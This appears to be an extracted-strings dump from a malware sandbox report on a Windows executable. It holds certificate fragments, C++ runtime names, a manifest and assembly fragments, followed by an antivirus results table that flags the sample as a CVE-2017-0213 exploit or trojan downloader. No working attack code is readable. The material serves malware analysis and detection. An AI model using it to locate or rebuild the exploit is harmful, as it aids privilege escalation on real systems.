Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 20100
$`2X`F
Ehttp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
>http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
1http://www.microsoft.com/PKI/docs/CPS/default.htm0@
oK0D$"<
r~akow
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 20100
171002230052Z
190102230052Z0
Washington1
Redmond1
Microsoft Corporation1
AOC1&0$
Thales TSS ESN:96FF-4BC5-A7DC1%0#
Microsoft Time-Stamp Service0
{S?YN {
J4=THJ$
m`](}'fi
Ehttp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z
>http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0
Washington1
Redmond1
Microsoft Corporation1
AOC1&0$
Thales TSS ESN:96FF-4BC5-A7DC1%0#
Microsoft Time-Stamp Service
Washington1
Redmond1
Microsoft Corporation1
AOC1'0%
nCipher NTS ESN:2665-4C3F-C5DE1+0)
"Microsoft Time Source Master Clock0
20180404213741Z
20180405213741Z0w0=
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 2010
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 2010
~L(P0>`Z0
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVbad_array_new_length@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_fstream@DU?$char_traits@D@std@@@std@@
.?AVios_base@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVbad_cast@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AVexception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
!This program cannot be run in DOS mode.
gRich4
`.rdata
@.data
.pdata
@.didat
@.reloc
l$ VWAVH
} H9:u
;D$(u;H
WATAUAVAWH
A_A^A]A\_
USVWATAUAVAWH
8A_A^A]A\_^[]
x UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
f#D$@H
USVWATAUAVAWH
8A_A^A]A\_^[]
x UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
VWATAVAWH
D8"u3H
A_A^A\_^
L$pD9c
D9&tYA
USVWATAUAVAWH
8A_A^A]A\_^[]
x UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A!)A!i
pA_A^A]A\_^]
p WAVAWH
A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
p WAVAWH
A_A^_
WAVAWH
A_A^_
SUVWATAUAVAWH
H9\$ u
H+L$(x@H
8A_A^A]A\_^][
UVWATAUAVAWH
t$pH9\$ u
H+L$(xBH
0A_A^A]A\_^]
UVWATAUAVAWH
E!)E!i
l$ <0u
pA_A^A]A\_^]
x ATAVAWH
@A_A^A\
WATAUAVAWH
0A_A^A]A\_
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
E!)E!i
pA_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
A_A^_
UVWATAUAVAWH
E!)E!i
`A_A^A]A\_^]
@USVWATAUAVH
e0A^A]A\_^[]
HcD$hH
@UAVAWH
H!T$0D
!T$(H!T$
x AVAWE3
|$0A_A^
u0!D$0
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWL
f;*s)A
L;\$Xt
\$PA_A^A]A\_^]
H9D$Xu
WATAUAVAWH
A_A^A]A\_
` AUAVAWH
d$8A_A^A]
H9D$Xu
x ATAVAWH
0A_A^A\
l$ VWATAVAWH
A_A^A\_^
UVWAVAWH
0A_A^_^]
t$ WAVAWH
L9|$pveH;
fD9|$Xu
H;D$pr
0A_A^_
UVWAVAWH
@A_A^_^]
UVWAVAWH
@A_A^_^]
UVWAVAWH
A_A^_^]
L90u H
tbL9Chu
UWATAVAWH
A@L90t+H
A_A^A\_]
D8K|t/L9
L9L$(D
UAVAWH
u&8_qt
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
WAVAWH
A_A^_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WAVAWH
A_A^_
\$ UVWH
|$L.uj
.uZf9l$PuSH
@USVWAVAWH
H9\$@t
CL$0E3
u3f9\$~t
|$~.u$f9]
A_A^_^[]
l$ VWAVH
fA9,Qu
fA9,Qu
x ATAVAWH
A_A^A\
H WATAUAVAWH
A_A^A]A\_
WAVAWH
A_A^_
WAVAWH
A_A^_
L$ SUVWH
WAVAWH
0A_A^_
WAVAWH
0A_A^_
UVWATAUAVAWH
u;D!EH
u;D!EH
PA_A^A]A\_^]
USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
USVWAVAWH
D$@H9D$8t
A_A^_^[]
USVWAVAWH
D$@H9D$8t
A_A^_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVATAUAVAWH
A_A^A]A\^[]
AUAVAWH
A_A^A]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
t$HD8O
A8H90t
A8H90t
A8H90t
l$4@8t$1u
A_A^A]A\_^]
A8H90t
A8H90t
UVWATAUAVAWH
A8H98t
A8H98t
A8H98t
uyI9>uyE
A8H98t
A_A^A]A\_^]
UVWATAUAVAWH
\$4D8W
t$8D8W
D8T$1u
A_A^A]A\_^]
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
UVWATAUAVAWH
pA_A^A]A\_^]
x ATAVAWH
A_A^A\
t$ WATAUAVAWH
A_A^A]A\_
@SUVWATAUAVAWH
8A_A^A]A\_^][
UVWAVAWH
pA_A^_^]
WAVAWH
A_A^_
\$ UVWATAUAVAWH
@A_A^A]A\_^]
VWATAVAWH
9FHtQH
@A_A^A\_^
WAVAWH
A_A^_
WAVAWH
A_A^_
L90u$H
tnL9Chu
UVWAVAWH
A_A^_^]
UAVAWH
u&8_rt
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
SUVWATAVAWH
0A_A^A\_^][
UVWATAUAVAWH
pA_A^A]A\_^]
UVWATAUAVAWH
pA_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
WAVAWH
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWATAVAWH
H9t$@t
A_A^A\_^][
L;L$(t
L;L$(A
USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
USVWATAVAWH
D$@H9D$8t
A_A^A\_^[]
USVWATAVAWH
D$@H9D$8t
A_A^A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
UATAUAVAWH
A_A^A]A\]
WAVAWH
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWATAVAWH
H9t$@t
A_A^A\_^][
USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
USVWATAVAWH
D$@H9D$8t
A_A^A\_^[]
USVWATAVAWH
D$@H9D$8t
A_A^A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
d<-u`H
`A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
\$@H9_
$< t6<$t,<+t"<vt
\$@H+_
A_A^A]A\_^]
UVWATAUAVAWH
X@D8uotaH
<vt{<x
t$HL9F
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
t$HD8O
A8H90t
A8H90t
A8H90t
l$4@8t$1u
A_A^A]A\_^]
A8H90t
A8H90t
UVWATAUAVAWH
A8H98t
A8H98t
|$0@8{
A8H98t
u{I9>u{E
A8H98t
D8\$0u
D$8D8\$0u
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
\$@H9_
$< t6<$t,<+t"<vt
\$@H+_
A_A^A]A\_^]
UVWATAUAVAWH
X@D8uotaH
<vt{<x
t$HL9F
A_A^A]A\_^]
WATAUAVAWH
D$0.fD
D$0,fD
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
t$HD8O
A8H90t
A8H90t
A8H90t
l$4@8t$1u
A_A^A]A\_^]
A8H90t
A8H90t
UVWATAUAVAWH
A8H98t
A8H98t
|$0@8{
A8H98t
u{I9>u{E
A8H98t
D8\$0u
D$8D8\$0u
A_A^A]A\_^]
SVWATAUAVAWH
SUD8oDu
pA_A^A]A\_^[
UVWATAUAVAWH
\$4D8W
t$8D8W
D8T$1u
A_A^A]A\_^]
WATAUAVAWH
SUD8oDu
A_A^A]A\_
UVWATAUAVAWH
\$4D8W
t$8D8W
D8T$1u
A_A^A]A\_^]
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!L$
ui8Z$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!L$
ui8Z$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
@A_A^A]A\_^]
UWAUAVAWH
A_A^A]_]
UATAUAVAWH
A_A^A]A\]
WAVAWH
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWATAVAWH
H9t$@t
A_A^A\_^][
UVWATAUAVAWH
e<-uaH
`A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
AUAVAWH
A_A^A]
UVWATAUAVAWH
\$0H9^
$< t6<$t,<+t"<vt
(D$PE3
D9L$,uDH
\$0H+^
H+\$0H
A_A^A]A\_^]
UVWATAUAVAWH
X@D8uotbH
<vtw<x
D$8L9u
A_A^A]A\_^]
WATAUAVAWH
WUE8nDu
A_A^A]A\_
u<!L$
ui8Z$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
u<!T$`
ui8Y$t
WATAUAVAWH
A_A^A]A\_
SUVWAUAVAWH
A_A^A]_^][
WATAUAVAWH
A_A^A]A\_
SUVWAUAVAWH
A_A^A]_^][
WATAUAVAWH
A_A^A]A\_
SUVWAUAVAWH
A8L98t
A8L98t
A8H90t
A8H90t
A_A^A]_^][
sfA;P
x AVAWH
N`A_A^
SVWATAVAWH
HA_A^A\_^[
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
SVWAVAWH
@A_A^_^[
SVWAVAWH
@A_A^_^[
SVWATAVAWH
HA_A^A\_^[
WAVAWH
|$xH!y
@A_A^_
WAVAWH
|$xH!y
@A_A^_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
@A_A^A\_^
WATAUAVAWH
A_A^A]A\_
SVWAVAWH
A8H98t
@A_A^_^[
SVWAVAWH
@A_A^_^[
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
SVWATAVAWH
A_A^A\_^[
VWATAVAWH
A_A^A\_^
SVWATAVAWH
A_A^A\_^[
VWATAVAWH
A_A^A\_^
\$XD9\$`t
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
WAVAWH
SVWAVAWH
@A_A^_^[
SVWAVAWH
@A_A^_^[
SVWATAVAWH
HA_A^A\_^[
WAVAWH
|$xH!y
@A_A^_
WAVAWH
|$xH!y
@A_A^_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
@A_A^A\_^
WATAUAVAWH
A_A^A]A\_
SVWAVAWH
A8H98t
Antivirus Signature
Bkav W32.AIDetectVM.malware1
Lionic Trojan.Script.Generic.a!c
ClamAV Clean
FireEye Generic.mg.dba25831a9434a39
CAT-QuickHeal Trojandownloader.Script
Qihoo-360 Win32/Trojan.Downloader.251
ALYac Gen:Variant.Razy.724405
Cylance Unsafe
VIPRE Clean
Sangfor Malware
K7AntiVirus Exploit ( 005478fc1 )
BitDefender Gen:Variant.Razy.724405
K7GW Exploit ( 005478fc1 )
Cybereason malicious.1a9434
Arcabit Trojan.Razy.DB0DB5
TrendMicro Clean
Baidu Clean
F-Prot Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Exploit.CVE-2017-0213.B
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 85)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba TrojanDownloader:Win32/CVE-2017-0213.a45656b2
NANO-Antivirus Trojan.Win32.CVE20170213.gksdex
SUPERAntiSpyware Clean
MicroWorld-eScan Gen:Variant.Razy.724405
Rising Exploit.CVE-2017-0213!8.E88E (CLOUD)
Ad-Aware Gen:Variant.Razy.724405
Emsisoft Gen:Variant.Razy.724405 (B)
Comodo Malware@#1xcsxigm2fk7k
F-Secure Exploit.EXP/CVE-2017-0213.gyfuu
DrWeb Trojan.DownLoader30.46188
Zillya Exploit.Generic.Win32.287
Invincea heuristic
Trapmine Clean
CMC Clean
Sophos Mal/Generic-S
Ikarus Exploit.CVE-2017-0213
Cyren Clean
Jiangmin TrojanDownloader.Script.gwk
Webroot Clean
Avira EXP/CVE-2017-0213.gyfuu
MAX malware (ai score=85)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:Win32/Tiggre!rfn
Endgame malicious (high confidence)
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Avast-Mobile Clean
GData Gen:Variant.Razy.724405
AhnLab-V3 Trojan/Win32.Agent.C3604458
Acronis Clean
McAfee Artemis!DBA25831A943
TACHYON Clean
VBA32 BScope.Trojan.MulDrop
Malwarebytes Clean
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Win32.Trojan.Razy.Wugw
Yandex Exploit.CVE-2017-0213!
SentinelOne DFI - Suspicious PE
eGambit Clean
Fortinet W32/Script.B!tr.dldr
BitDefenderTheta Clean
AVG Win32:Trojan-gen
Avast Win32:Trojan-gen
CrowdStrike win/malicious_confidence_80% (W)
MaxSecure Trojan.Malware.11403058.susgen
No IRMA results available.